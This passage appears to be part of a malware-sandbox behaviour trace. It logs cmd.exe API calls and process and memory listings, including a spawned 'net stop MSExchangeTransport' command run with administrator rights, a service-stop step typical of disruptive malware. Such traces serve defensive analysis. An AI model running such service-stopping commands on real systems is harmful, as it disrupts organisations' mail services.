_wcsicmp (_String1="net", _String2="ECHO") returned 9 [0142.001] _wcsicmp (_String1="net", _String2="SET") returned -5 [0142.001] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0142.001] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0142.001] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0142.001] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0142.001] _wcsicmp (_String1="net", _String2="MD") returned 1 [0142.001] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0142.001] _wcsicmp (_String1="net", _String2="RD") returned -4 [0142.002] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0142.002] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0142.002] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0142.002] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0142.002] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0142.002] _wcsicmp (_String1="net", _String2="VER") returned -8 [0142.002] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0142.002] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0142.002] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0142.002] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0142.002] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0142.002] _wcsicmp (_String1="net", _String2="START") returned -5 [0142.002] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0142.002] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0142.002] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0142.002] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0142.002] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0142.002] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0142.002] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0142.002] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0142.002] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0142.002] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0142.002] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0142.002] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0142.002] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0142.002] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="CD") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0142.002] _wcsicmp (_String1="net", _String2="REN") returned -4 [0142.002] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0142.002] _wcsicmp (_String1="net", _String2="SET") returned -5 [0142.002] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0142.002] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0142.002] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0142.002] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0142.002] _wcsicmp (_String1="net", _String2="MD") returned 1 [0142.002] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0142.002] _wcsicmp (_String1="net", _String2="RD") returned -4 [0142.002] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0142.002] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0142.002] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0142.002] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0142.002] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0142.002] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0142.002] _wcsicmp (_String1="net", _String2="VER") returned -8 [0142.002] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0142.002] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0142.002] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0142.002] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0142.003] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0142.003] _wcsicmp (_String1="net", _String2="START") returned -5 [0142.003] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0142.003] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0142.003] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0142.003] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0142.003] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0142.003] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0142.003] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0142.003] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0142.003] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0142.003] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0142.003] _wcsicmp (_String1="net", _String2="FOR") returned 8 [0142.003] _wcsicmp (_String1="net", _String2="IF") returned 5 [0142.003] _wcsicmp (_String1="net", _String2="REM") returned -4 [0142.003] _wcsnicmp (_String1="net", _String2="cmd ", _MaxCount=0x4) returned 11 [0142.003] SetErrorMode (uMode=0x0) returned 0x0 [0142.003] SetErrorMode (uMode=0x1) returned 0x0 [0142.003] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x53005d0, lpFilePart=0x506f014 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x506f014*="Desktop") returned 0x1d [0142.003] SetErrorMode (uMode=0x0) returned 0x1 [0142.003] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0142.003] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0142.011] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0142.011] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0142.011] GetConsoleTitleW (in: lpConsoleTitle=0x506f294, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.011] InitializeProcThreadAttributeList (in: lpAttributeList=0x506f1c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x506f1a4 | out: lpAttributeList=0x506f1c0, lpSize=0x506f1a4) returned 1 [0142.011] UpdateProcThreadAttribute (in: lpAttributeList=0x506f1c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x506f1ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x506f1c0, lpPreviousValue=0x0) returned 1 [0142.011] GetStartupInfoW (in: lpStartupInfo=0x506f1f8 | out: lpStartupInfo=0x506f1f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.012] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.013] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0142.014] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSExchangeTransport", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x506f148*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSExchangeTransport", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x506f194 | out: lpCommandLine="net stop MSExchangeTransport", lpProcessInformation=0x506f194*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xda0, dwThreadId=0xd54)) returned 1 [0142.020] CloseHandle (hObject=0xa4) returned 1 [0142.020] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0142.020] GetEnvironmentStringsW () returned 0x5309ed8* [0142.021] FreeEnvironmentStringsA (penv="=") returned 1 [0142.021] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0142.161] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x506f12c | out: lpExitCode=0x506f12c*=0x2) returned 1 [0142.162] CloseHandle (hObject=0xa8) returned 1 [0142.162] _vsnwprintf (in: _Buffer=0x506f214, _BufferCount=0x13, _Format="%08X", _ArgList=0x506f134 | out: _Buffer="00000002") returned 8 [0142.162] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0142.162] GetEnvironmentStringsW () returned 0x5307d70* [0142.162] FreeEnvironmentStringsA (penv="=") returned 1 [0142.162] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0142.162] GetEnvironmentStringsW () returned 0x5307d70* [0142.162] FreeEnvironmentStringsA (penv="=") returned 1 [0142.162] DeleteProcThreadAttributeList (in: lpAttributeList=0x506f1c0 | out: lpAttributeList=0x506f1c0) [0142.162] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.162] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0142.163] _get_osfhandle (_FileHandle=1) returned 0x3c [0142.163] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0142.163] _get_osfhandle (_FileHandle=0) returned 0x38 [0142.163] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0142.163] SetConsoleInputExeNameW () returned 0x1 [0142.163] GetConsoleOutputCP () returned 0x1b5 [0142.163] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0142.163] SetThreadUILanguage (LangId=0x0) returned 0x409 [0142.163] exit (_Code=2) Thread: id = 772 os_tid = 0xdb4 Process: id = "266" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x2a948000" os_pid = "0xd68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "265" os_parent_pid = "0xd60" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12605 start_va = 0x7f085000 end_va = 0x7f085fff entry_point = 0x0 region_type = private name = "private_0x000000007f085000" filename = "" Region: id = 12606 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12607 start_va = 0xe7b7260000 end_va = 0xe7b727ffff entry_point = 0x0 region_type = private name = "private_0x000000e7b7260000" filename = "" Region: id = 12608 start_va = 0xe7b7280000 end_va = 0xe7b7293fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7b7280000" filename = "" Region: id = 12609 start_va = 0xe7b72a0000 end_va = 0xe7b72dffff entry_point = 0x0 region_type = private name = "private_0x000000e7b72a0000" filename = "" Region: id = 12610 start_va = 0x7df5ff200000 end_va = 0x7ff5ff1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff200000" filename = "" Region: id = 12611 start_va = 0x7ff6c48d0000 end_va = 0x7ff6c48f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48d0000" filename = "" Region: id = 12612 start_va = 0x7ff6c48f8000 end_va = 0x7ff6c48f8fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48f8000" filename = "" Region: id = 12613 start_va = 0x7ff6c48fe000 end_va = 0x7ff6c48fffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48fe000" filename = "" Region: id = 12614 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 12615 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12616 start_va = 0xe7b7260000 end_va = 0xe7b726ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7b7260000" filename = "" Region: id = 12617 start_va = 0xe7b72e0000 end_va = 0xe7b739dfff entry_point = 0xe7b72e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12618 start_va = 0xe7b7480000 end_va = 0xe7b757ffff entry_point = 0x0 region_type = private name = "private_0x000000e7b7480000" filename = "" Region: id = 12619 start_va = 0x7ff6c47d0000 end_va = 0x7ff6c48cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47d0000" filename = "" Region: id = 12620 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12621 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12622 start_va = 0xe7b7270000 end_va = 0xe7b7276fff entry_point = 0x0 region_type = private name = "private_0x000000e7b7270000" filename = "" Region: id = 12623 start_va = 0xe7b73a0000 end_va = 0xe7b73dffff entry_point = 0x0 region_type = private name = "private_0x000000e7b73a0000" filename = "" Region: id = 12624 start_va = 0xe7b73e0000 end_va = 0xe7b73e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7b73e0000" filename = "" Region: id = 12625 start_va = 0xe7b73f0000 end_va = 0xe7b73f6fff entry_point = 0x0 region_type = private name = "private_0x000000e7b73f0000" filename = "" Region: id = 12626 start_va = 0xe7b7400000 end_va = 0xe7b7400fff entry_point = 0x0 region_type = private name = "private_0x000000e7b7400000" filename = "" Region: id = 12627 start_va = 0xe7b7410000 end_va = 0xe7b7410fff entry_point = 0x0 region_type = private name = "private_0x000000e7b7410000" filename = "" Region: id = 12628 start_va = 0xe7b7440000 end_va = 0xe7b744ffff entry_point = 0x0 region_type = private name = "private_0x000000e7b7440000" filename = "" Region: id = 12629 start_va = 0xe7b7580000 end_va = 0xe7b7707fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7b7580000" filename = "" Region: id = 12630 start_va = 0xe7b7710000 end_va = 0xe7b7890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7b7710000" filename = "" Region: id = 12631 start_va = 0xe7b78a0000 end_va = 0xe7b8c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e7b78a0000" filename = "" Region: id = 12632 start_va = 0x7ff6c48fc000 end_va = 0x7ff6c48fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c48fc000" filename = "" Region: id = 12633 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 12634 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 12635 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12636 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 12637 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12638 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12639 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12640 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12641 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12642 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12643 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 12644 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 768 os_tid = 0xb30 Thread: id = 769 os_tid = 0xd74 Thread: id = 770 os_tid = 0xd64 Process: id = "267" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x3e905000" os_pid = "0xda0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "265" os_parent_pid = "0xd60" cmd_line = "net stop MSExchangeTransport" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12658 start_va = 0x220000 end_va = 0x239fff entry_point = 0x220000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 12659 start_va = 0x370000 end_va = 0x436ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 12660 start_va = 0x4370000 end_va = 0x438ffff entry_point = 0x0 region_type = private name = "private_0x0000000004370000" filename = "" Region: id = 12661 start_va = 0x4390000 end_va = 0x4391fff entry_point = 0x0 region_type = private name = "private_0x0000000004390000" filename = "" Region: id = 12662 start_va = 0x43a0000 end_va = 0x43b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000043a0000" filename = "" Region: id = 12663 start_va = 0x43c0000 end_va = 0x43fffff entry_point = 0x0 region_type = private name = "private_0x00000000043c0000" filename = "" Region: id = 12664 start_va = 0x4400000 end_va = 0x447ffff entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 12665 start_va = 0x4480000 end_va = 0x4483fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004480000" filename = "" Region: id = 12666 start_va = 0x4490000 end_va = 0x4490fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004490000" filename = "" Region: id = 12667 start_va = 0x44a0000 end_va = 0x44a1fff entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 12668 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 12669 start_va = 0x7e480000 end_va = 0x7e4a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e480000" filename = "" Region: id = 12670 start_va = 0x7e4a6000 end_va = 0x7e4a6fff entry_point = 0x0 region_type = private name = "private_0x000000007e4a6000" filename = "" Region: id = 12671 start_va = 0x7e4a7000 end_va = 0x7e4a7fff entry_point = 0x0 region_type = private name = "private_0x000000007e4a7000" filename = "" Region: id = 12672 start_va = 0x7e4ad000 end_va = 0x7e4affff entry_point = 0x0 region_type = private name = "private_0x000000007e4ad000" filename = "" Region: id = 12673 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12674 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 12675 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 12676 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12677 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 12678 start_va = 0x45b0000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 12679 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 12680 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 12681 start_va = 0x45f0000 end_va = 0x46effff entry_point = 0x0 region_type = private name = "private_0x00000000045f0000" filename = "" Region: id = 12682 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 773 os_tid = 0xd54 Thread: id = 774 os_tid = 0xda4 Process: id = "268" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x3e857000" os_pid = "0xdcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "267" os_parent_pid = "0xda0" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeTransport" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12683 start_va = 0xa70000 end_va 